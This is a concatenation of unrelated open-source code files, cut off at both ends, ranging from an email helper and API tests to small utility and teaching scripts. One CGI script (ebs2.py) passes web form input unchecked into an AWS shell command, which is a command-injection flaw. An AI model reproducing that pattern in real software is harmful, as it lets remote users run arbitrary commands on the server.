i\n\n print('output test accur: %.4f corresponding times %d' % (test_accur_rec, i_rec))\n\nif __name__ == '__main__':\n main()","repo_name":"litsycn/Limited_Gradient_Desent","sub_path":"LGD_relabeling.py","file_name":"LGD_relabeling.py","file_ext":"py","file_size_in_byte":11009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30516571316","text":"\"\"\"\nLow level abstraction over smtplib for sending emails from the Aurora\n\nIt looks like you don't need to specify passwords to send emails which simplifies things a lot\n\"\"\"\n\nimport smtplib\nfrom base64 import b64encode\nfrom logging import getLogger\nfrom os.path import basename\n\nfrom airbox import config\n\nlogger = getLogger(__name__)\n\nMAX_LINE_WIDTH = 76\nMARKER = \"AUNIQUEMARKER\"\n\nBODY_SEC = \"\"\"Content-Type: text/plain\nContent-Transfer-Encoding:8bit\n\n{}\n\n--{}\n\"\"\"\n\nATTACHMENT_SEC = \"\"\"Content-Type: {}; name=\\\"{}\\\"\nContent-Transfer-Encoding:base64\nContent-Disposition: attachment; filename={}\n\n{}\n\n--{}\"\"\"\n\n\ndef encode_attachment(fname, content_type='application/pdf'):\n # Read a file and encode it into base64 format\n fo = open(fname, \"rb\")\n filecontent = fo.read()\n\n b64 = b64encode(filecontent).decode()\n\n # Convert to a fixed line width\n l = \"\"\n num_lines = len(b64) // MAX_LINE_WIDTH\n for i in range(num_lines + 1):\n l += b64[i * MAX_LINE_WIDTH:(i + 1) * MAX_LINE_WIDTH] + '\\n'\n\n # Define the attachment section\n return ATTACHMENT_SEC.format(content_type, basename(fname), basename(fname), l, MARKER)\n\n\ndef generate_header(params):\n tags = \"\\n\".join([\"{}: {}\".format(k, v) for k, v in params])\n return tags + \"\\n\\n--{}\\n\".format(MARKER)\n\n\ndef addrs_to_list(to):\n return \", \".join(['<{}>'.format(t) for t in to])\n\n\ndef sendmail(to, subject, content, attachments=None, cc=None):\n from_addr = config['email_from']\n if attachments is None:\n attachments = []\n\n # Create the header\n header_kwargs = [\n (\"From\", from_addr),\n (\"To\", addrs_to_list(to)),\n (\"Subject\", subject),\n (\"MIME-Version\", \"1.0\"),\n (\"Content-Type\", 'multipart/mixed; boundary=\"{}\"'.format(MARKER))\n ]\n if cc is not None:\n header_kwargs.insert(2, (\"CC\", addrs_to_list(cc)))\n header = generate_header(header_kwargs)\n\n # Define the message action\n body = BODY_SEC.format(content, MARKER)\n\n message = header + body + \\\n \"\\n\".join([encode_attachment(fname, content_type) for content_type, fname in attachments]) + '--'\n logger.info('Sending message \"{}\" to {}. Total size: {}KB'.format(subject, addrs_to_list(to), len(message) / 1024))\n logger.debug(message)\n if not config['debug']:\n try:\n smtp = smtplib.SMTP('147.66.72.6') # smtp.aad.gov.au ip - DNS incorrectly configured on ship\n smtp.sendmail(from_addr, to, message)\n except smtplib.SMTPException:\n logger.exception('Failed to send message:\\n{}'.format(message))\n raise\n else:\n logger.info('Skipping sending email due to debug mode')\n","repo_name":"lewisjared/airbox","sub_path":"airbox/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71073722988","text":"from itertools import chain\nfrom time import sleep\nfrom datetime import datetime\nfrom uuid import uuid4\nfrom tests.system_tests import fsmRequests, base_test_class, handlers_examples\nfrom tests.system_tests.test_data_option import *\n\n\nclass TestEvents(base_test_class.BaseTest):\n name = 'test_visionlabs_test_events_class'\n events = {}\n\n @classmethod\n def setUpClass(cls):\n # create lists\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListDescriptors = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListPersons = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n outputList = reply.body['list_id']\n\n # create descriptors\n for d in descriptorsImgs_search:\n reply = cls.lunaClient.extractDescriptors(filename=d)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkListToDescriptor(dId, inputListDescriptors)\n assert reply.statusCode == 204, reply.statusCode\n\n # create persons\n for p in personsImgs_search:\n reply = cls.lunaClient.createPerson(cls.name)\n assert reply.statusCode == 201, reply.statusCode\n pId = reply.body['person_id']\n cls.personsToDelete += [pId]\n\n reply = cls.lunaClient.extractDescriptors(filename=p)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkDescriptorToPerson(pId, dId)\n assert reply.statusCode == 204, reply.statusCode\n\n reply = cls.lunaClient.linkListToPerson(pId, inputListPersons)\n assert reply.statusCode == 204, reply.statusCode\n\n # remember last person data\n cls.sim_person = pId\n cls.sim_descriptor = dId\n\n # create handlers\n reply = fsmRequests.createHandler(handlers_examples.searchHandlerTestEvents(\n cls.name, 'events', inputListDescriptors, inputListPersons, outputList\n ))\n assert reply.statusCode == 201, reply.statusCode\n handler_events = reply.json['handler_id']\n\n reply = fsmRequests.createHandler(handlers_examples.searchHandlerTestEvents(\n cls.name, 'groups', inputListDescriptors, inputListPersons, outputList\n ))\n assert reply.statusCode == 201, reply.statusCode\n handler_groups = reply.json['handler_id']\n\n # send two fake events with another create_time, user_data, source, age and gender but same handler_id\n reply = fsmRequests.emitEvent(handler_events, personsImgs_search[0], {'user_data': \"fake\", 'source': \"fake\"})\n assert reply.statusCode == 201, reply.json\n reply = fsmRequests.emitEvent(handler_events, personsImgs_search[0], {'user_data': \"fake\", 'source': \"fake\",\n 'tags': 'fake'})\n assert reply.statusCode == 201, reply.json\n sleep(1)\n\n cls.start = datetime.now().isoformat('T').split('.')[0] + 'Z'\n reply = fsmRequests.emitEvent(handler_events, events_search[0], {'user_data': cls.name, 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'})\n assert reply.statusCode == 201, reply.body\n cls.events['simple'] = reply.json['events'][0]\n\n reply = fsmRequests.emitEvent(handler_groups, events_search[0], {'user_data': cls.name, 'source': cls.name})\n assert reply.statusCode == 201, reply.body\n cls.events['grouping'] = reply.json['events'][0]\n\n sleep(1)\n\n cls.stop = datetime.now().isoformat('T').split('.')[0] + 'Z'\n\n def assertSearch(self, result, filtersOk, filtersNOk):\n defaultFilters = {\n 'handler_ids': result['handler_id']\n }\n if any(f in chain(filtersOk, filtersNOk) for f in defaultFilters):\n defaultFilters = {}\n\n # TP - FP\n reply = fsmRequests.searchEvents({**defaultFilters, **filtersOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json['total'], 1, reply.json['total'])\n self.assertEqual(reply.json['hits'][0], result, reply.json['hits'][0])\n\n # TN - FN\n reply = fsmRequests.searchEvents({**defaultFilters, **filtersNOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n if 'page' in filtersNOk:\n self.assertEqual(len(reply.json['hits']), 0, len(reply.json['hits']))\n else:\n self.assertEqual(reply.json['total'], 0, reply.json['total'])\n\n def test_id(self):\n eId = self.events['simple']['id']\n\n reply = fsmRequests.getEvent(eId)\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json, self.events['simple'], reply.json['source'])\n\n def test_time_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'create_time__gt': self.stop,\n }\n )\n\n def test_gender_filter(self):\n gender = round(self.events['simple']['extract']['attributes']['gender'])\n\n self.assertSearch(\n self.events['simple'],\n {\n 'gender': gender\n },\n {\n 'gender': int(not gender),\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_handler_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'handler_ids': str(uuid4()) + ',' + self.events['simple']['handler_id'],\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'handler_ids': str(uuid4()) + ',' + str(uuid4()),\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_age_filter(self):\n age = int(self.events['simple']['extract']['attributes']['age'])\n ages = age, age + 1\n\n self.assertSearch(\n self.events['simple'],\n {\n 'age__gt': ages[0],\n 'age__lt': ages[1]\n },\n {\n 'age__gt': ages[1]\n }\n )\n\n def test_source_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sources': self.events['simple']['source'] + ',' + 'test_Abudabi'\n },\n {\n 'sources': 'test_Abudabi,test_Abudabi'\n }\n )\n\n def test_similarity_filter(self):\n sim = round(self.events['simple']['search'][1]['candidates'][0]['similarity'], 3)\n self.assertSearch(\n self.events['simple'],\n {\n 'similarity__lt': sim + 0.001,\n 'similarity__gt': sim - 0.001\n },\n {\n 'similarity__lt': 0\n }\n )\n\n def test_group_filter(self):\n self.assertSearch(\n self.events['grouping'],\n {\n 'group_id': self.events['grouping']['group_id'],\n },\n {\n 'group_id': str(uuid4()),\n }\n )\n\n def test_sim_descriptor_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_descriptor': self.sim_descriptor\n },\n {\n 'sim_descriptor': str(uuid4())\n }\n )\n\n def test_sim_person_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_person': self.sim_person\n },\n {\n 'sim_person': str(uuid4())\n }\n )\n\n def test_sim_list_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_list': self.events['simple']['search'][0]['list_id'],\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'sim_list': str(uuid4())\n }\n )\n\n def test_sim_user_data(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_user_data': self.name,\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'sim_user_data': 'test_Abudabi',\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_user_data_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'user_data': self.name\n },\n {\n 'user_data': 'test_Abudabi'\n }\n )\n\n def test_pagination_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'page_size': 1,\n 'page': 1,\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'page_size': 1,\n 'page': 2,\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_tag_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'tags': self.name\n },\n {\n 'tags': self.name[:-1]\n }\n )\n\n def test_tags_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'tags': self.name + '1' + ',' + self.name\n },\n {\n 'tags': self.name[:-1] + ',' + self.name\n }\n )\n\n def test_wrong_id(self):\n eId = '123'\n reply = fsmRequests.getEvent(eId)\n self.assertEqual(reply.statusCode, 404, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12021, 'detail': 'Page not found'}, reply.json)\n\n def test_wrong_time_filter(self):\n stop = start = 'Abudabi'\n reply = fsmRequests.searchEvents({'create_time__gt': start})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__gt'\"},\n reply.json)\n reply = fsmRequests.searchEvents({'create_time__lt': stop})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__lt'\"},\n reply.json)\n\n def test_wrong_gender_filter(self):\n gender = 'Abudabi'\n reply = fsmRequests.searchEvents({'gender': gender})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'gender'\"},\n reply.json)\n\n def test_wrong_handler_filter(self):\n handler_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'handler_ids': handler_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'handler_ids'\"},\n reply.json)\n\n def test_wrong_age_filter(self):\n age__lt = age__gt = 'Abudabi'\n reply = fsmRequests.searchEvents({'age__gt': age__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__gt'\"},\n reply.json)\n reply = fsmRequests.searchEvents({'age__lt': age__lt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__lt'\"},\n reply.json)\n\n def test_wrong_similarity_filter(self):\n similarity__gt = similarity__lt = 'Abudabi'\n reply = fsmRequests.searchEvents({'similarity__lt': similarity__lt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'similarity__lt'\"},\n reply.json)\n reply = fsmRequests.searchEvents({'similarity__gt': similarity__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'similarity__gt'\"},\n reply.json)\n\n def test_wrong_group_id_filter(self):\n group_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'group_id': group_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'group_id'\"},\n reply.json)\n\n def test_wrong_external_id_filter(self):\n external_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'external_id': external_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'external_id'\"},\n reply.json)\n\n def test_wrong_sim_descriptor_filter(self):\n sim_descriptor = 'Abudabi'\n reply = fsmRequests.searchEvents({'sim_descriptor': sim_descriptor})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_descriptor'\"},\n reply.json)\n\n def test_wrong_sim_person_filter(self):\n sim_person = 'Abudabi'\n reply = fsmRequests.searchEvents({'sim_person': sim_person})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_person'\"},\n reply.json)\n\n def test_wrong_person_id_filter(self):\n person_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'person_id': person_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'person_id'\"},\n reply.json)\n\n def test_wrong_page_filter(self):\n page = 'Abudabi'\n reply = fsmRequests.searchEvents({'page': page})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'page'\"},\n reply.json)\n\n def test_wrong_page_size_filter(self):\n page_size = 'Abudabi'\n reply = fsmRequests.searchEvents({'page_size': page_size})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'page_size'\"},\n reply.json)\n","repo_name":"qonteo/luna","sub_path":"fsm2_linux_rel_v.2.0.0/tests/system_tests/unittests_events_filters.py","file_name":"unittests_events_filters.py","file_ext":"py","file_size_in_byte":15760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22947632306","text":"import re\nimport urllib.request\nimport requests\nimport sys\n\nbasepath = 'downloads/'\nbase_clip_path = 'https://clips-media-assets2.twitch.tv/'\n\n\ndef retrieve_mp4_data(slug):\n cid = sys.argv[1]\n clip_info = requests.get(\n \"https://api.twitch.tv/helix/clips?id=\" + slug,\n headers={\"Client-ID\": cid}).json()\n thumb_url = clip_info['data'][0]['thumbnail_url']\n title = clip_info['data'][0]['title']\n slice_point = thumb_url.index(\"-preview-\")\n mp4_url = thumb_url[:slice_point] + '.mp4'\n return mp4_url, title\n\n\ndef dl_progress(count, block_size, total_size):\n percent = int(count * block_size * 100 / total_size)\n sys.stdout.write(\"\\r...%d%%\" % percent)\n sys.stdout.flush()\n\n\n# for each clip in clips.txt\nfor clip in open('clips.txt', 'r'):\n slug = clip.split('/')[3].replace('\\n', '')\n mp4_url, clip_title = retrieve_mp4_data(slug)\n regex = re.compile('[^a-zA-Z0-9_]')\n clip_title = clip_title.replace(' ', '_')\n out_filename = regex.sub('', clip_title) + '.mp4'\n output_path = (basepath + out_filename)\n\n print('\\nDownloading clip slug: ' + slug)\n print('\"' + clip_title + '\" -> ' + out_filename)\n print(mp4_url)\n urllib.request.urlretrieve(mp4_url, output_path, reporthook=dl_progress)\n print('\\nDone.')\n\nprint('Finished downloading all the videos.')\n","repo_name":"amiechen/twitch-batch-loader","sub_path":"batchloader.py","file_name":"batchloader.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"72175872427","text":"from django.conf.urls import url\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', view_home, name='home'),\n url(r'^subscriptions/e/(?P\\d+)/(?P.+)/$', ManageEmailSubscriptions.as_view(), name='subscriptions_email'),\n url(r'^subscriptions/j/(?P\\d+)/(?P.+)/$', ManageJaneusSubscriptions.as_view(), name='subscriptions_janeus'),\n url(r'^subscriptions/done/$', subscriptions_done),\n url(r'^subscriptions/u/(?P.+)/$', unsubscribe_landing),\n url(r'^subscriptions/a/(?P.+)/$', unsubscribe_sendmail),\n url(r'^subscriptions/U/(?P.+)/$', unsubscribe_unsub),\n url(r'^view/(?P\\d+)/$', view_newsletter, name='view_newsletter'),\n url(r'^test/(?P\\d+)$', test_newsletter, name='test_newsletter'),\n url(r'^prepare/(?P\\d+)$', prepare_sending, name='prepare_sending'),\n url(r'^process/(?P\\d+)$', process_sending, name='process_sending'),\n url(r'^list/$', list_all, name='list_all'),\n url(r'^css/(?P\\d+)$', get_css, name='get_css'),\n]\n","repo_name":"jonge-democraten/hemres","sub_path":"hemres/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19613175555","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom fastapi.openapi.utils import get_openapi\nfrom model import AirlineModel, Airline\n\n# Create the app and model objects\napp = FastAPI(swagger_ui_parameters={\"syntaxHighlight.theme\": \"obsidian\"})\nmodel = AirlineModel()\n\n@app.get('/')\ndef index():\n return {'message': 'Hello, traveler!'}\n# Expose prediction functionality, make predictions from inputted\n# Airline name and return the predicted sentiment\n\n@app.get('/predict/{name}')\ndef predict_sentiment(name):\n airline = Airline()\n data = airline.dict()\n if name.upper() not in data.keys():\n return \"This airline does not exist in the data.\"\n data.update({name.upper() : 1})\n pred = model.predict_sentiment(data)\n if pred == 1:\n sentiment = \"positive\"\n else:\n sentiment = \"negative\"\n return {\n 'prediction': sentiment\n } \n\ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"Airline Sentiment Analysis\",\n version=\"1.0.0\",\n description=\"Find sentiments for airlines\",\n routes=app.routes,\n )\n openapi_schema[\"info\"][\"x-logo\"] = {\n \"url\": \"https://fastapi.tiangolo.com/img/logo-margin/logo-teal.png\"\n }\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n# Run the API with uvicorn on http://127.0.0.1:8000\nif __name__ == '__main__':\n uvicorn.run(app, host='127.0.0.1', port=8000)\n\napp.openapi = custom_openapi","repo_name":"Sora34CE/Airline_Sentiment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70253921066","text":"#!/usr/bin/python3\nprint(\"content-type:text/html\")\nprint()\n\nimport subprocess\nimport cgi\ny = cgi.FieldStorage()\nvi=y.getvalue(\"vid\")\nii=y.getvalue(\"id\")\nout = subprocess.getoutput(\"aws ec2 attach-volume --instance-id {} --volume-id {} --device /dev/sdc\".format(ii,vi))\nout=\"YOUR VOLUME WITH id={}Gb ATTACHED TO INSTANCE WITH id={}!!!\".format(vi,ii)\nprint(out)\n","repo_name":"shrishtikapoor01/ARTH-TASK-8","sub_path":"ebs2.py","file_name":"ebs2.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14859194981","text":"import psutil\n\nimport sys\n\nclass Statusbar(object):\n \"\"\"\n Creates a progress bar.\n\n Parameters\n ----------\n num_tasks: int\n Total number of tasks to be completed.\n title: str, optional\n Title for progress bar. Default is None.\n barsize: int, optional\n Total number of bars to use for length of progress bar. Default is\n 50.\n mem_monitor: bool, optional\n Include a display of available memory and abort execution if\n available memory drops below threshold.\n mem_thresh: int, optional\n If available memory drops below this level, execution is aborted.\n Units are in GB. Default is 1.\n\n Returns\n -------\n None\n \"\"\"\n\n def __init__(self, num_tasks, title=None, barsize=50, mem_monitor=False,\n mem_thresh=1):\n self._title = title\n self._barsize = barsize\n self._num_tasks = num_tasks\n self._mem_monitor = mem_monitor\n self._mem_thresh = mem_thresh * 1024 * 1024 * 1024\n\n def initialize(self):\n sys.stdout.write('\\r')\n if self._title is not None:\n sys.stdout.write(self._title + '\\n')\n sys.stdout.write('[{:{}s}] {}%'.format('=' * 0, self._barsize, 0))\n if self._mem_monitor:\n memory_stats = psutil.virtual_memory()\n available = memory_stats.available\n sys.stdout.write('\\nAvailable Memory: {:.2f}GB'.format(available/10**9))\n sys.stdout.flush()\n\n def update(self, bars):\n fraction_complete = bars/float(self._num_tasks)\n increment = int(self._barsize * fraction_complete)\n percent_increment = 100 * fraction_complete\n if self._mem_monitor:\n sys.stdout.write('\\033[F')\n sys.stdout.write('\\r')\n sys.stdout.write('[{:{}s}] {:.2f}%'.format('=' * increment, self._barsize, percent_increment))\n if self._mem_monitor:\n memory_stats = psutil.virtual_memory()\n available = memory_stats.available\n if available < self._mem_thresh:\n raise MemoryError('Not enough memory available to continue. Aborting.')\n #sys.exit()\n else:\n sys.stdout.write('\\nAvailable Memory: {:.2f}GB'.format(available/10**9))\n sys.stdout.flush()\n\n","repo_name":"jzeitoun/scanbox-analysis","sub_path":"python/statusbar.py","file_name":"statusbar.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6800102998","text":"def combinations(k, m, n):\n pool = tuple(\"a\" * k + \"b\" * m + \"c\" * n)\n n = len(pool)\n indices = list(range(4))\n _ = tuple(pool[i] for i in indices)\n count = 0\n if 'a' in _ and 'b' in _ and 'c' in _:\n count += 1\n while True:\n for i in reversed(range(4)):\n if indices[i] != i + n - 4:\n break\n else:\n return count\n indices[i] += 1\n for j in range(i + 1, 4):\n indices[j] = indices[j - 1] + 1\n\n _ = tuple(pool[i] for i in indices)\n if 'a' in _ and 'b' in _ and 'c' in _:\n count += 1\n\n\nprint(combinations(*[int(i) for i in input().split(\" \")]))\n","repo_name":"vladyar334/YandexLyceum","sub_path":"AI_EntranceTest/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14129120975","text":"pars = default_pars_single() # get default parameters\n\n# set your external input and wEE\npars['I_ext'] = 0.5\npars['w'] = 5.0\n\nr = np.linspace(0, 1, 1000) # give the values of r\n\n# Calculate drEdt\ndrdt = (-r + F(pars['w'] * r + pars['I_ext'],\n pars['a'], pars['theta'])) / pars['tau']\n\nwith plt.xkcd():\n plot_dr_r(r, drdt)\n\n # Calculate the first fixed point with your initial value\n x_fp_1 = my_fp_single(pars, 0.)\n if check_fp_single(pars, x_fp_1):\n plt.plot(x_fp_1, 0, 'bo', ms=8)\n\n # Calculate the second fixed point with your initial value\n x_fp_2 = my_fp_single(pars, 0.4)\n if check_fp_single(pars, x_fp_2):\n plt.plot(x_fp_2, 0, 'ro', ms=8)\n\n # Calculate the third fixed point with your initial value\n x_fp_3 = my_fp_single(pars, 0.9)\n if check_fp_single(pars, x_fp_3):\n plt.plot(x_fp_3, 0, 'yo', ms=8)\n\n plt.show()","repo_name":"ddinesan/Neuroscience","sub_path":"tutorials/W3D2_DynamicNetworks/solutions/W3D2_Tutorial1_Solution_37eb2320.py","file_name":"W3D2_Tutorial1_Solution_37eb2320.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6225196133","text":"import numpy as np\nimport random as rand\nimport math\n\nseed = input(\"Input a seed for the random numbers (blank is a random seed): \") \nif seed != \"\":\n np.random.seed(int(seed))\n rand.seed(int(seed))\n\ndef findMean(x): #finding the mean\n s = math.fsum(x)\n return s/(len(x))\n\ndef findVariance(x): #finding the variance\n s = findMean(x)\n s2 = 0\n for i in x: #for every float in x\n s2 += pow((i - s), 2) #add it to s2\n return (s2/(len(x) - 1))\n\ndef listToString(list):\n retval = \"\"\n for i in range(len(list)):\n retval += str(list[i])\n return retval\n\npoisson = np.random.poisson(lam=5, size=1000)\nexponential = [rand.expovariate(0.5) for i in range (1000)]\nnormal = [rand.gauss(10, 5) for i in range(1000)]\n\npoisson_mean = findMean(poisson)\nexponential_mean = findMean(exponential)\nnormal_mean = findMean(normal)\n\npoisson_variance = findVariance(poisson)\nexponential_variance = findVariance(exponential)\nnormal_variance = findVariance(normal)\n\npoisson_list = [\"Poisson -- Expected Mean: \", 5, \" | Actual Mean: \", poisson_mean, \" | Expected Variance: \", 5, \" | Actual Variance: \", poisson_variance]\nexponential_list = [\"\\nExponential -- Expected Mean: \", 1/0.5, \" | Actual Mean: \", exponential_mean, \" | Expected Variance: \", 1/(0.5**2), \"| Actual Variance: \", exponential_variance]\nnormal_list = [\"\\nNormal -- Expected Mean: \", 10, \" | Actual Mean: \", normal_mean, \" | Expected Variance: \", 5**2, \" | Actual Variance: \", normal_variance]\n\nfile_thing = open(\"distribution_expected_and_actual.txt\", \"w\")\nfile_thing.write(listToString(poisson_list))\nfile_thing.write(listToString(exponential_list))\nfile_thing.write(listToString(normal_list))\nfile_thing.close()\n\nprint(listToString(poisson_list))\nprint(listToString(exponential_list))\nprint(listToString(normal_list))\n\nfile_thing","repo_name":"viabard/biological-models-in-python","sub_path":"Week 4 - Distributions and Weasel/week4_part1.py","file_name":"week4_part1.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38404415274","text":"def get_data():\n data = {\n \"data\": {\n \"type\": \"content\",\n \"id\": \"rwoA7p5\",\n \"attributes\": {\n \"content-type\": \"Course\",\n \"external-id\": \"Course:24\",\n \"title\": \"Public Speaking\",\n \"summary\": \"Learn how to give an impressive speech in the Public Speaking - Communicating with Confidence course, delivered by award winning presenter TJ Walker.\",\n \"url\": \"https://www.goskills.com/Course/Public-Speaking?utm_source=degreed\",\n \"format\": None,\n \"is-obsolete\": False,\n \"image-url\": \"https://www.goskills.com/blobs/bags/59/new-share-card.png\",\n \"language\": \"en\",\n \"duration\": 9790.0,\n \"duration-type\": \"Seconds\",\n \"provider\": None,\n \"is-internal\": True,\n \"owner\": None,\n \"created-at\": \"2022-02-16T20:41:15.6960031\",\n \"modified-at\": \"2022-02-16T20:41:15.664766\",\n \"degreed-url\": \"https://betatest.degreed.com/courses/?d=JP14N760OP\",\n },\n \"links\": {\"self\": \"https://api.betatest.degreed.com/api/v2/content/rwoA7p5\"},\n }\n }\n return data\n\n\ndef get_final_entity_details():\n data = {\n \"entity_id\": \"rwoA7p5\",\n \"cta_label\": \"Course\",\n \"cta_url\": \"https://betatest.degreed.com/courses/?d=JP14N760OP\",\n \"custom_sections\": [],\n \"description\": 'Learn how to give an impressive speech in the Public Speaking - Communicating with Confidence course, delivered by award winning presenter TJ Walker. ',\n \"fields\": [\n {\"name\": \"Provider\", \"value\": \"Internal\"},\n {\"name\": \"Duration Hours\", \"value\": 2.72},\n {\"name\": \"Content Type\", \"value\": \"Course\"},\n {\"name\": \"Language\", \"value\": \"en\"},\n {\"name\": \"Owner\", \"value\": \"NA\"},\n {\"name\": \"Published Date\", \"value\": \"16/02/2022\"},\n {\"name\": \"Last Modified Date\", \"value\": \"16/02/2022\"},\n ],\n \"image_url\": \"https://www.goskills.com/blobs/bags/59/new-share-card.png\",\n \"last_modified_ts\": 1645044075,\n \"metadata\": [],\n \"source_name\": \"Internal\",\n \"subtitle\": \"\",\n \"tags\": \"\",\n \"title\": \"Public Speaking\",\n }\n return data\n","repo_name":"payls/Degreed-App","sub_path":"tests/fake_data/entity_details.py","file_name":"entity_details.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41082186537","text":"\"\"\"\nTic Tac Toe player\n\"\"\"\nimport copy\nimport math\nimport random\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\ndef initial_state():\n \"\"\"\n :return: starting state of the board\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\ndef player(board):\n \"\"\"\n :param board:\n :return: player who has the next turn on a given board\n \"\"\"\n # if the board is empty it's X's turn\n if board == initial_state():\n return X\n # count how many Xs and Os in the board\n total_Xs = 